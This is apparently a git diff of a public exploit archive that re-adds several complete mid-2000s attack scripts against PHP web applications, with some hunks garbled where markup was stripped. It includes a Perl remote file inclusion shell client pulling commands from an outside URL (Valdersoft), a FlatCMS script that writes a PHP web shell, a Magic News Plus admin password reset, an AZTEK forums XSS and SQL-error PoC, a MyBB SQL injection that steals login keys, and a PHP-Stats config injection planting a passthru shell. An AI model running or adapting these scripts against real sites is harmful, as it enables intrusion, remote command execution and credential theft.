+# uid=2526(apache) gid=2524(apache) groups=2524(apache), 10004(psaserv)
+# FreeBSD valdersoft.com 4.9-RELEASE FreeBSD 4.9-RELEASE #0: Wed Nov 19 00:35:22 EST 2003
+# tim@temp.atlnetworks.com:/usr/src/sys/compile/PLESK i386
+#
+# [cijfer@www.valdersoft.com /]$
+#
+## 2. explanation
+#
+# various files within 'include\templates\categories' contains unsanitized and undefined
+# variables which can allow remote file inclusion, leading to remote command execution.
+# this can be done by entering a remote url within the 'catalogDocumentRoot' variable.
+#
+## 3. the bug
+#
+# this is obvious _why_ it is dangerous.
+#
+# ...
+# include($catalogDocumentRoot.$catalogDir."include/modules/categories_path.php");
+# ...
+#
+## 4. the php shell
+#
+# this exploit grabs data via regular expression strings. 
foreign php shell
+# scripts will not work with this exploit. use the following code along with
+# this exploit and put it in 'cmd.txt' or whatever you please:
+#
+#
+#
+##
+#
+# $Id: cijfer-vscxpl.pl,v 0.2 2005/12/30 11:44:00 cijfer Exp cijfer $
+
+use Getopt::Std;
+use IO::Socket;
+use URI::Escape;
+
+getopts("h:d:");
+
+$host = $opt_h;
+$dirs = $opt_d;
+$shel = "http://site.com/cmd.txt"; # cmd shell url
+$cmdv = "cmd"; # cmd variable (ex. passthru($_GET[cmd]);)
+$good = 0;
+
+if(!$host||!$dirs)
+{
+ print "cijfer-vscxpl.pl by cijfer\n";
+ print "usage: $0 -h cijfer.xxx -d /valdersoft\r\n";
+ print "usage: $0 -h -d \r\n";
+ exit();
+}
+
+while()
+{
+ print "[cijfer@".$host." /]\$ ";
+ while()
+ {
+ $cmds=$_;
+ chomp($cmds);
+ last;
+ }
+
+ $string = $dirs;
+ $string .= "/include/templates/categories/default.php?";
+ $string .= uri_escape($cmdv);
+ $string .= "=";
+ $string .= "%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B";
+ $string .= uri_escape($cmds).";echo";
+ $string .= "%3B%65%63%68%6F%20%5F%45%4E%44%5F;echo;";
+ $string .= "&catalogDocumentRoot=";
+ $string .= $shel;
+ $string .= "?";
+
+ $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
+
+ print $sock "GET $string HTTP/1.1\n";
+ print $sock "Host: $host\n";
+ print $sock "Accept: */*\n";
+ print $sock "Connection: close\n\n";
+
+ while($result = <$sock>)
+ {
+ if($result =~ /^_END_/)
+ {
+ $good=0;
+ }
+
+ if($good==1)
+ {
+ print $result;
+ }
+
+ if($result =~ /^_START_/)
+ {
+ $good=1;
+ }
+ }
+}
+
+# milw0rm.com [2006-01-03]
diff --git a/platforms/php/webapps/1405.pl b/platforms/php/webapps/1405.pl
index b642e4986..82a0ca322 100755
--- a/platforms/php/webapps/1405.pl
+++ b/platforms/php/webapps/1405.pl
@@ -1,87 +1,87 @@
-#!/usr/bin/perl
-#
-# FlatCMS <=1.01 Remote Command Execution Exploit
-#
-# Copyright (c) 2005 cijfer
-# All rights reserved.
-#
-# An input validation flaw exists within 'admin/file_editor.php'
-# of FlatCMS which can lead to remote command execution.
-# Here is where the problem is (line 22 of 97):
-#
-# ...
-# [1] if($save_file != "") {
-# [2] $f_content = stripslashes("$f_content");
-# if(!$f_w = fopen($save_file, w)) {
-# echo ("Cannot open file ("."$save_file".")
\n");
-}
-[3] if(!fwrite($f_w,$f_content)) {
-# echo ("File "."$save_file"." is not writable!
\n");
-}
-echo("Done saving file "."$save_file"."
\n");
-}
-...
-#
-# 1. If $save_file is not empty, use it.
-# 2. $f_content filters only slashes? that is all?
-# 3. write contents of $f_content into $save_file! :))
-#
-# kiitos ReZEN (www.xorcrew.net) :))
-#
-# $Id: cijfer-fcmsxpl.pl,v 0.1 2005/01/04 03:48:00 cijfer Exp cijfer $
-
-use LWP::UserAgent;
-use URI::Escape;
-use Getopt::Long;
-use Term::ANSIColor;
-
-$port = 80;
-$res = GetOptions("host=s" => \$host, "dir=s" => \$dir, "port=i" => \$port, "tunnel=s" => \$tunnel);
-
-&usage unless $host and $dir;
-
-while()
-{
- print color("green"), "cijfer\$ ", color("reset"); # colors :))!
- chomp($command = );
- exit unless $command;
- &exploit($command);
-}
-
-sub usage
-{
- print "FlatCMS <=1.01 Remote Command Execution Exploit\n";
- print "Usage: $0 -hd [OPTION]...\n\n";
- print " -h --host\thostname or ip of target\n";
- print " -d --dir\tdirectory without ending slash\n";
- print " -p --port\tport number (default: 80)\n";
- print " -t --tunnel\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n\n";
- exit;
-}
-
-sub exploit
-{
- $cij=LWP::UserAgent->new() or die;
- $cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)");
- $cij->proxy("http", "http://".$tunnel."/") unless !$tunnel;
-
- $string = "echo%20_cijfer_%3B";
- $string .= uri_escape(shift);
- $string .= "%3Becho%20_cijfer_";
-
- $execut = "%3C%3F%24handle%3Dpopen%5C%28%24_GET%5Bcij%5D%2C%22r%22%29%3Bwhile%28%21feof";
- $execut .= "%28%24handle%29%29%7B%24line%3Dfgets%28%24handle%29%3Bif%28strlen%28%24line%";
- $execut .= "29%3E%3D1%29%7Becho%22%24line%22%3B%7D%7Dpclose%28%24handle%29%3B%3F%3E";
-
- $path = "http://".$host.$dir."/admin/file_editor.php";
- $out=$cij->get($path."?save_file=cijfer.php&f_content=".$execut);
- $out=$cij->get("http://".$host.$dir."/admin/cijfer.php?cij=".$string);
-
- if($out->is_success)
- {
- @cij=split("_cijfer_",$out->content);
- print substr(@cij[1],1);
- }
-}
-
-# milw0rm.com [2006-01-04]
+#!/usr/bin/perl
+#
+# FlatCMS <=1.01 Remote Command Execution Exploit
+#
+# 
Copyright (c) 2005 cijfer
+# All rights reserved.
+#
+# An input validation flaw exists within 'admin/file_editor.php'
+# of FlatCMS which can lead to remote command execution.
+# Here is where the problem is (line 22 of 97):
+#
+# ...
+# [1] if($save_file != "") {
+# [2] $f_content = stripslashes("$f_content");
+# if(!$f_w = fopen($save_file, w)) {
+# echo ("Cannot open file ("."$save_file".")
\n");
+}
+[3] if(!fwrite($f_w,$f_content)) {
+# echo ("File "."$save_file"." is not writable!
\n");
+}
+echo("Done saving file "."$save_file"."
\n");
+}
+...
+#
+# 1. If $save_file is not empty, use it.
+# 2. $f_content filters only slashes? that is all?
+# 3. write contents of $f_content into $save_file! :))
+#
+# kiitos ReZEN (www.xorcrew.net) :))
+#
+# $Id: cijfer-fcmsxpl.pl,v 0.1 2005/01/04 03:48:00 cijfer Exp cijfer $
+
+use LWP::UserAgent;
+use URI::Escape;
+use Getopt::Long;
+use Term::ANSIColor;
+
+$port = 80;
+$res = GetOptions("host=s" => \$host, "dir=s" => \$dir, "port=i" => \$port, "tunnel=s" => \$tunnel);
+
+&usage unless $host and $dir;
+
+while()
+{
+ print color("green"), "cijfer\$ ", color("reset"); # colors :))!
+ chomp($command = );
+ exit unless $command;
+ &exploit($command);
+}
+
+sub usage
+{
+ print "FlatCMS <=1.01 Remote Command Execution Exploit\n";
+ print "Usage: $0 -hd [OPTION]...\n\n";
+ print " -h --host\thostname or ip of target\n";
+ print " -d --dir\tdirectory without ending slash\n";
+ print " -p --port\tport number (default: 80)\n";
+ print " -t --tunnel\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n\n";
+ exit;
+}
+
+sub exploit
+{
+ $cij=LWP::UserAgent->new() or die;
+ $cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)");
+ $cij->proxy("http", "http://".$tunnel."/") unless !$tunnel;
+
+ $string = "echo%20_cijfer_%3B";
+ $string .= uri_escape(shift);
+ $string .= "%3Becho%20_cijfer_";
+
+ $execut = "%3C%3F%24handle%3Dpopen%5C%28%24_GET%5Bcij%5D%2C%22r%22%29%3Bwhile%28%21feof";
+ $execut .= "%28%24handle%29%29%7B%24line%3Dfgets%28%24handle%29%3Bif%28strlen%28%24line%";
+ $execut .= "29%3E%3D1%29%7Becho%22%24line%22%3B%7D%7Dpclose%28%24handle%29%3B%3F%3E";
+
+ $path = "http://".$host.$dir."/admin/file_editor.php";
+ $out=$cij->get($path."?save_file=cijfer.php&f_content=".$execut);
+ $out=$cij->get("http://".$host.$dir."/admin/cijfer.php?cij=".$string);
+
+ if($out->is_success)
+ {
+ @cij=split("_cijfer_",$out->content);
+ print substr(@cij[1],1);
+ }
+}
+
+# milw0rm.com [2006-01-04]
diff --git a/platforms/php/webapps/1410.pl b/platforms/php/webapps/1410.pl
index 6ae65d3ab..d60c7e402 100755
--- a/platforms/php/webapps/1410.pl
+++ b/platforms/php/webapps/1410.pl
@@ -1,105 +1,105 @@ -#!/usr/bin/perl -# -# Magic News Plus <=1.0.3 Admin Pass Change Exploit -# -# Copyright (c) 2006 cijfer -# All rights reserved. -# -# An input validation flaw exists within 'settings.php' -# of Magic News Plus which can lead to the changing of -# the administrative password. Here is where the problem -# is (line 108 of 426): -# -# ... -# [1] elseif ($action == "change") -# ... -# [2] if ($passwd != $admin_password) -# ... -# [3] if ($new_passwd != $confirm_passwd) -# ... -# -# 1. &action=change -# 2. &passwd=&admin_password= -# 3. &new_passwd=&confirm_passwd= -# -# -> register_globals = on -# -# haha, sorry, no cmd execute this time. -# -# $Id: cijfer-mnxpl.pl,v 0.1 2006/01/07 19:24:00 cijfer Exp cijfer $ - -use LWP::UserAgent; -use Getopt::Long; -use Term::ANSIColor; - -$port = 80; -$new = "cijfer"; -$res = GetOptions("host=s" => \$host, "dir=s" => \$dir, "port=i" => \$port, "tunnel=s" => \$tunnel, "new=s" => \$new); - -&usage unless $host and $dir; -&exploit; - -sub usage -{ - print "Magic News Plus <=1.0.3 Admin Pass Change Exploit\n"; - print "Usage: $0 -hdn [OPTION]...\n\n"; - print " -h --host\thostname or ip of target\n"; - print " -d --dir\tdirectory without ending slash\n"; - print " -p --port\tport number (default: 80)\n"; - print " -t --tunnel\tprovide an HTTP proxy (ex. 
0.0.0.0:8080)\n"; - print " -n --new\tnew admin password you want (default: cijfer)\n\n"; - exit; -} - -sub try -{ - $cij=LWP::UserAgent->new() or die; - $cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)"); - $cij->proxy("http", "http://".$tunnel."/") unless !$tunnel; - - $path="http://".$host.$dir."/"; - $out=$cij->get($path."index.php?login=admin&password=".$new."&action=login"); - - if($out->is_success) - { - if($out->content =~ /Wrong/) - { - print color("red"), ":(\n", color("reset"); - exit; - } - } -} - -sub exploit -{ - $cij=LWP::UserAgent->new() or die; - $cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)"); - $cij->proxy("http", "http://".$tunnel."/") unless !$tunnel; - - $string = "settings.php?action=change"; - $string .= "&passwd=cijfer"; - $string .= "&admin_password=cijfer"; - $string .= "&new_passwd="; - $string .= $new; - $string .= "&confirm_passwd="; - $string .= $new; - - $path="http://".$host.$dir."/"; - $out=$cij->get($path.$string); - - if($out->is_success) - { - print "trying username admin and password ".$new."...\n"; - &try; - print "user: admin, pass: ".$new; - print color("green"), " :)) ", color("reset"); - print "-- http://".$host.$dir."\n"; - } - else - { - print color("red"), ":(\n", color("reset"); - exit; - } -} - -# milw0rm.com [2006-01-09] +#!/usr/bin/perl +# +# Magic News Plus <=1.0.3 Admin Pass Change Exploit +# +# Copyright (c) 2006 cijfer +# All rights reserved. +# +# An input validation flaw exists within 'settings.php' +# of Magic News Plus which can lead to the changing of +# the administrative password. Here is where the problem +# is (line 108 of 426): +# +# ... +# [1] elseif ($action == "change") +# ... +# [2] if ($passwd != $admin_password) +# ... +# [3] if ($new_passwd != $confirm_passwd) +# ... +# +# 1. &action=change +# 2. &passwd=&admin_password= +# 3. &new_passwd=&confirm_passwd= +# +# -> register_globals = on +# +# haha, sorry, no cmd execute this time. 
+#
+# $Id: cijfer-mnxpl.pl,v 0.1 2006/01/07 19:24:00 cijfer Exp cijfer $
+
+use LWP::UserAgent;
+use Getopt::Long;
+use Term::ANSIColor;
+
+$port = 80;
+$new = "cijfer";
+$res = GetOptions("host=s" => \$host, "dir=s" => \$dir, "port=i" => \$port, "tunnel=s" => \$tunnel, "new=s" => \$new);
+
+&usage unless $host and $dir;
+&exploit;
+
+sub usage
+{
+ print "Magic News Plus <=1.0.3 Admin Pass Change Exploit\n";
+ print "Usage: $0 -hdn [OPTION]...\n\n";
+ print " -h --host\thostname or ip of target\n";
+ print " -d --dir\tdirectory without ending slash\n";
+ print " -p --port\tport number (default: 80)\n";
+ print " -t --tunnel\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n";
+ print " -n --new\tnew admin password you want (default: cijfer)\n\n";
+ exit;
+}
+
+sub try
+{
+ $cij=LWP::UserAgent->new() or die;
+ $cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)");
+ $cij->proxy("http", "http://".$tunnel."/") unless !$tunnel;
+
+ $path="http://".$host.$dir."/";
+ $out=$cij->get($path."index.php?login=admin&password=".$new."&action=login");
+
+ if($out->is_success)
+ {
+ if($out->content =~ /Wrong/)
+ {
+ print color("red"), ":(\n", color("reset");
+ exit;
+ }
+ }
+}
+
+sub exploit
+{
+ $cij=LWP::UserAgent->new() or die;
+ $cij->agent("Mozilla/5.0 [en] (X11; I; SunOS 5.6 sun4u)");
+ $cij->proxy("http", "http://".$tunnel."/") unless !$tunnel;
+
+ $string = "settings.php?action=change";
+ $string .= "&passwd=cijfer";
+ $string .= "&admin_password=cijfer";
+ $string .= "&new_passwd=";
+ $string .= $new;
+ $string .= "&confirm_passwd=";
+ $string .= $new;
+
+ $path="http://".$host.$dir."/";
+ $out=$cij->get($path.$string);
+
+ if($out->is_success)
+ {
+ print "trying username admin and password ".$new."...\n";
+ &try;
+ print "user: admin, pass: ".$new;
+ print color("green"), " :)) ", color("reset");
+ print "-- http://".$host.$dir."\n";
+ }
+ else
+ {
+ print color("red"), ":(\n", color("reset");
+ exit;
+ }
+}
+
+# milw0rm.com [2006-01-09]
diff --git a/platforms/php/webapps/14415.html b/platforms/php/webapps/14415.html
index 8bc5e7432..f57197ebf 100755
--- a/platforms/php/webapps/14415.html
+++ b/platforms/php/webapps/14415.html
@@ -37,7 +37,7 @@ FILE NAME:
  (ex. shell.php)
FILE CONTENTS:
- +'"> - - Valid. - - Click on "Citer" to execute the script. - - You can also do it with the edit button (after loging in). - -2- - Do the following request : http://SOME_HOST/forum/index.php?msg=*/* - It will dump a MySQL error message which can dump login:pw infos. - -3- - - Register with : - login : 6b 66 73 6a 64 61 20 54 50 68 70 45 72 72 6f 72 45 78 63 65 - 70 74 69 6f 6e 0d 0a 44 65 73 63 72 69 70 74 69 6f 6e 0d 0a 5b 57 61 - 72 6e 69 6e 67 5d 20 6d 79 73 71 6c 5f 63 6f 6e 6e 65 63 74 28 29 20 - 5b 3c 61 20 68 72 65 66 3d 27 66 75 - [...a huge login name...] - 6e 63 74 69 6f 6e 2e 6d 79 73 71 6c 2d 63 6f 6e 6e 65 63 74 27 3e 66 - 75 6e 63 74 69 6f 6e 2e 6d 79 73 71 6c 2d 63 6f 6e - passwd:blabla - email:blabla@gmail.com - - Valid. - - This form is not validated at all, so it can cause a MySQL error like : - - Mysql error in file - /home/httpd/vhosts/www.**********.com/web/forum/index/actions.php in - function subscribe at line 222 - - Mysql query error : - INSERT INTO atk_users (login,owner,passwd,email,show_email,alert_mp,subscribe) - VALUES ('6b 66 73 6a 64 61 20 54 50 68 - [...]','admin','atHax4CLQE42Q','blabla@gmail.com','1','1','1141202540') - - Please note this error and contact your administrator. - --- -PoC by lorenzo [GHT], http://ght.c.la/ - -# milw0rm.com [2006-03-02] +/*==========================================*/ +// AZTEK forums 4.0 multiple vulnerabilities (PoC) +// Product: AZTEK forums +// URL: http://www.forum-aztek.com/ +// RISK: high +/*==========================================*/ + +[PoC] + +1- XSS + - Post a message including the following line: </textarea>'"> + - Valid. + - Click on "Citer" to execute the script. + + You can also do it with the edit button (after loging in). + +2- + Do the following request : http://SOME_HOST/forum/index.php?msg=*/* + It will dump a MySQL error message which can dump login:pw infos. 
+
+3-
+ - Register with :
+ login : 6b 66 73 6a 64 61 20 54 50 68 70 45 72 72 6f 72 45 78 63 65
+ 70 74 69 6f 6e 0d 0a 44 65 73 63 72 69 70 74 69 6f 6e 0d 0a 5b 57 61
+ 72 6e 69 6e 67 5d 20 6d 79 73 71 6c 5f 63 6f 6e 6e 65 63 74 28 29 20
+ 5b 3c 61 20 68 72 65 66 3d 27 66 75
+ [...a huge login name...]
+ 6e 63 74 69 6f 6e 2e 6d 79 73 71 6c 2d 63 6f 6e 6e 65 63 74 27 3e 66
+ 75 6e 63 74 69 6f 6e 2e 6d 79 73 71 6c 2d 63 6f 6e
+ passwd:blabla
+ email:blabla@gmail.com
+ - Valid.
+
+ This form is not validated at all, so it can cause a MySQL error like :
+
+ Mysql error in file
+ /home/httpd/vhosts/www.**********.com/web/forum/index/actions.php in
+ function subscribe at line 222
+
+ Mysql query error :
+ INSERT INTO atk_users (login,owner,passwd,email,show_email,alert_mp,subscribe)
+ VALUES ('6b 66 73 6a 64 61 20 54 50 68
+ [...]','admin','atHax4CLQE42Q','blabla@gmail.com','1','1','1141202540')
+
+ Please note this error and contact your administrator.
+
+--
+PoC by lorenzo [GHT], http://ght.c.la/
+
+# milw0rm.com [2006-03-02]
diff --git a/platforms/php/webapps/1548.pl b/platforms/php/webapps/1548.pl
index 0b7538334..31daf6755 100755
--- a/platforms/php/webapps/1548.pl
+++ b/platforms/php/webapps/1548.pl
@@ -1,56 +1,56 @@ -#!/usr/bin/perl -w - -# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3 -# -# Milw0rm ID :- -# http://www.milw0rm.com/auth.php?id=1539 -# D3vil-0x1 | Devil-00 < BlackHat > :) -# -# DONT FORGET TO DO YOUR CONFIG !! -# DONT FORGET TO DO YOUR CONFIG !! -# DONT FORGET TO DO YOUR CONFIG !! -use IO::Socket; - -##-- Start --# - -$host = "127.0.0.1"; -$path = "/mybb3/"; -$userid = 1; -$mycookie = "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;"; - -##-- _END_ --## -# $host :- -# The Host Name Without http:// | exm. www.vic.com -# -# $path :- -# MyBB Dir On Server | exm. /mybb/ -# -# $userid :- -# The ID Of The User U Wanna To Get His Loginkey -# -# $cookie :- -# You Must Register Username And Get YourCookies ( mybb_user ) Then But it Like This -# -# $cookie = "mybbuser=[YourID]_[YourLoginkey];"; -$sock = IO::Socket::INET->new ( - PeerAddr => "$host", - PeerPort => "80", - Proto => "tcp" - ) or die("[!] Connect To Server Was Filed"); -##-- DONT TRY TO EDIT ME --## -$evilcookie = "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=$userid/*;"; -##-- DONT TRY TO EDIT ME --## -$evildata = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n"; -$evildata .= "Host: $host \n"; -$evildata .= "Accept: */* \n"; -$evildata .= "Keep-Alive: 300\n"; -$evildata .= "Connection: keep-alive \n"; -$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n"; - -print $sock $evildata; - -while($ans = <$sock>){ - $ans =~ m/(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- ".$1."\n"; -} - -# milw0rm.com [2006-03-03] +#!/usr/bin/perl -w + +# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3 +# +# Milw0rm ID :- +# http://www.milw0rm.com/auth.php?id=1539 +# D3vil-0x1 | Devil-00 < BlackHat > :) +# +# DONT FORGET TO DO YOUR CONFIG !! +# DONT FORGET TO DO YOUR CONFIG !! 
+# DONT FORGET TO DO YOUR CONFIG !!
+use IO::Socket;
+
+##-- Start --#
+
+$host = "127.0.0.1";
+$path = "/mybb3/";
+$userid = 1;
+$mycookie = "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";
+
+##-- _END_ --##
+# $host :-
+# The Host Name Without http:// | exm. www.vic.com
+#
+# $path :-
+# MyBB Dir On Server | exm. /mybb/
+#
+# $userid :-
+# The ID Of The User U Wanna To Get His Loginkey
+#
+# $cookie :-
+# You Must Register Username And Get YourCookies ( mybb_user ) Then But it Like This
+#
+# $cookie = "mybbuser=[YourID]_[YourLoginkey];";
+$sock = IO::Socket::INET->new (
+ PeerAddr => "$host",
+ PeerPort => "80",
+ Proto => "tcp"
+ ) or die("[!] Connect To Server Was Filed");
+##-- DONT TRY TO EDIT ME --##
+$evilcookie = "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=$userid/*;";
+##-- DONT TRY TO EDIT ME --##
+$evildata = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n";
+$evildata .= "Host: $host \n";
+$evildata .= "Accept: */* \n";
+$evildata .= "Keep-Alive: 300\n";
+$evildata .= "Connection: keep-alive \n";
+$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n";
+
+print $sock $evildata;
+
+while($ans = <$sock>){
+ $ans =~ m/(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- ".$1."\n";
+}
+
+# milw0rm.com [2006-03-03]
diff --git a/platforms/php/webapps/1549.php b/platforms/php/webapps/1549.php
index 74809784a..4091acfa8 100755
--- a/platforms/php/webapps/1549.php
+++ b/platforms/php/webapps/1549.php
@@ -1,251 +1,251 @@ - works regardless of magic_quotes_gpc settings... # -# usage: launch from Apache, fill in requested fields, then go! # -# # -# Sun-Tzu:"Of old, the rise of the Yin dynasty was due to I Chih who had # -# served under the Hsia. Likewise, the rise of the Chou dynasty was due to # -# Lu Ya who had served under the Yin." # - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); -ob_implicit_flush (1); - -echo'***** PHP-Stats <= 0.1.9.1 remote commands execution**** - -

-***** PHP-Stats <= 0.1.9.1 remote commands execution****

a -script by rgod at -http://retrogod.altervista.org

-
-

* target (ex:www.sitename.com) -

* path (ex: -/stats/ or just / )

* specify a command ("cat config.php" to see database username & -password...)

-specify a port other than 80 (default value)

send exploit through an HTTP proxy (ip:port) -

'; - -function show($headeri) -{ - $ii=0;$ji=0;$ki=0;$ci=0; - echo ''; - while ($ii <= strlen($headeri)-1){ - $datai=dechex(ord($headeri[$ii])); - if ($ji==16) { - $ji=0; - $ci++; - echo ""; - for ($li=0; $li<=15; $li++) { - echo ""; - } - $ki=$ki+16; - echo ""; - } - if (strlen($datai)==1) { - echo ""; - } - else { - echo " "; - } - $ii++;$ji++; - } - for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { - echo ""; - } - for ($li=$ci*16; $li<=strlen($headeri); $li++) { - echo ""; - } - echo "
  ".htmlentities($headeri[$li+$ki])."
0".htmlentities($datai)."".htmlentities($datai)."  ".htmlentities($headeri[$li])."
"; -} - -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; - -function sendpacket() //2x speed -{ - global $proxy, $host, $port, $packet, $html, $proxy_regex; - $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); - if ($socket < 0) { - echo "socket_create() failed: reason: " . socket_strerror($socket) . "
"; - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) {echo 'Not a valid proxy...'; - die; - } - echo "OK.
"; - echo "Attempting to connect to ".$host." on port ".$port."...
"; - if ($proxy=='') { - $result = socket_connect($socket, $host, $port); - } - else { - $parts =explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $result = socket_connect($socket, $parts[0],$parts[1]); - } - if ($result < 0) { - echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "

"; - } - else { - echo "OK.

"; - $html= ''; - socket_write($socket, $packet, strlen($packet)); - echo "Reading response:
"; - while ($out= socket_read($socket, 2048)) {$html.=$out;} - echo nl2br(htmlentities($html)); - echo "Closing socket..."; - socket_close($socket); - } - } -} - -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.htmlentities($host); die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid prozy...';die; - } - $parts=explode(':',$proxy); - echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; - $ock=fsockopen($parts[0],$parts[1]); - if (!$ock) { - echo 'No response from proxy...';die; - } - } - fputs($ock,$packet); - if ($proxy=='') { - $html=''; - while (!feof($ock)) { - $html.=fgets($ock); - } - } - else { - $html=''; - while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { - $html.=fread($ock,1); - } - } - fclose($ock);echo nl2br(htmlentities($html)); -} - -if ( get_magic_quotes_gpc() ) { - function stripslashes_deep($value) { - $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); - return $value; - } - $_POST = stripslashes_deep($_POST); -} - -$host=$_POST[host];$port=$_POST[port];$path=$_POST[path]; -$cmd=$_POST[cmd];$cmd=urlencode($cmd);$proxy=$_POST[proxy]; -echo ""; - -if (($host<>'') and ($path<>'') and ($cmd<>'')) -{ - $port=intval(trim($port)); - if ($port=='') {$port=80;} - if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} - if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} - $host=str_replace("\r","",$host);$host=str_replace("\n","",$host); - $path=str_replace("\r","",$path);$path=str_replace("\n","",$path); - - $SHELL =';if (isset($_GET[cmd])){if (get_magic_quotes_gpc()){'; - $SHELL.='$_GET[cmd] = stripslashes($_GET[cmd]);'; - $SHELL.='}passthru($_GET[cmd]);}//'; - #exploit... 
overwrite option[] array - #set a new admin password at run-time :) - #***************************************** - $data ="option="; - $data.="&option[admin_pass]=suntzu"; - #**************************************** - $data.="&option_new[callviaimg]=1"; - $data.="&option_new[php_stats_safe]=0"; - $data.="&option_new[out_compress]=1"; - $data.="&option_new[persistent_conn]=0"; - $data.="&option_new[autorefresh]=3"; - $data.="&option_new[show_server_details]=1"; - $data.="&option_new[show_average_user]=0"; - $data.="&option_new[short_url]=1"; - $data.="&option_new[lock_not_valid_url]=0"; - $data.="&option_new[ext_whois]="; - $data.="&option_new[online_timeout]=5"; - $data.="&option_new[page_title]="; - $data.="&option_new[online_timeout]=5"; - $data.="&option_new[page_title]=1"; - $data.="&option_new[log_host]=0"; - $data.="&option_new[clear_cache]=0"; - $data.="&option_new[full_recn]=0"; - $data.="&option_new[logerrors]=1"; - $data.="&option_new[check_new_version]=1"; - $data.="&option_new[www_trunc]=0"; - $data.="&option_new[accept_ssi]=1"; - # inject some code in compatibility_mode argument... - # you can use all values, they should be numeric - # but they are not checked - # and not delimited by quotes in config.php - # so it works regardless of magic_quotes_gpc ... 
- $data.="&option_new[compatibility_mode]=0".$SHELL; - $data.="&option_new[ip-zone]=0"; - $data.="&option_new[down_mode]=0"; - $data.="&option_new[check_links]=1"; - $data.="&mode=modify"; - $packet ="POST ".$p."admin.php?action=modify_config HTTP/1.1\r\n"; - $packet.="User-Agent: John Constantine\r\n"; - $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; - #******** the magic cookie **************** - $packet.="Cookie: php_stats_cache=1; pass_cookie=".md5("suntzu").";\r\n"; - #****************************************** - $packet.="Host: ".$host."\r\n"; - $packet.="Content-Length: ".strlen($data)."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - $packet.=$data; - show($packet); - sendpacketii($packet); - - $packet ="GET ".$p."config.php?cmd=".$cmd." HTTP/1.1\r\n"; - $packet.="User-Agent: URLBlaze\r\n"; - $packet.="Host: ".$host."\r\n"; - $packet.="Connection: Close\r\n\r\n"; - show($packet); - sendpacketii($packet); -} -else -{echo "Fill * required fields, optionally specify a proxy...";} -echo ""; -?> - -# milw0rm.com [2006-03-04] + works regardless of magic_quotes_gpc settings... # +# usage: launch from Apache, fill in requested fields, then go! # +# # +# Sun-Tzu:"Of old, the rise of the Yin dynasty was due to I Chih who had # +# served under the Hsia. Likewise, the rise of the Chou dynasty was due to # +# Lu Ya who had served under the Yin." # + +error_reporting(0); +ini_set("max_execution_time",0); +ini_set("default_socket_timeout",5); +ob_implicit_flush (1); + +echo'***** PHP-Stats <= 0.1.9.1 remote commands execution**** + +

+***** PHP-Stats <= 0.1.9.1 remote commands execution****

a +script by rgod at +http://retrogod.altervista.org

+
+

* target (ex:www.sitename.com) +

* path (ex: +/stats/ or just / )

* specify a command ("cat config.php" to see database username & +password...)

+specify a port other than 80 (default value)

send exploit through an HTTP proxy (ip:port) +

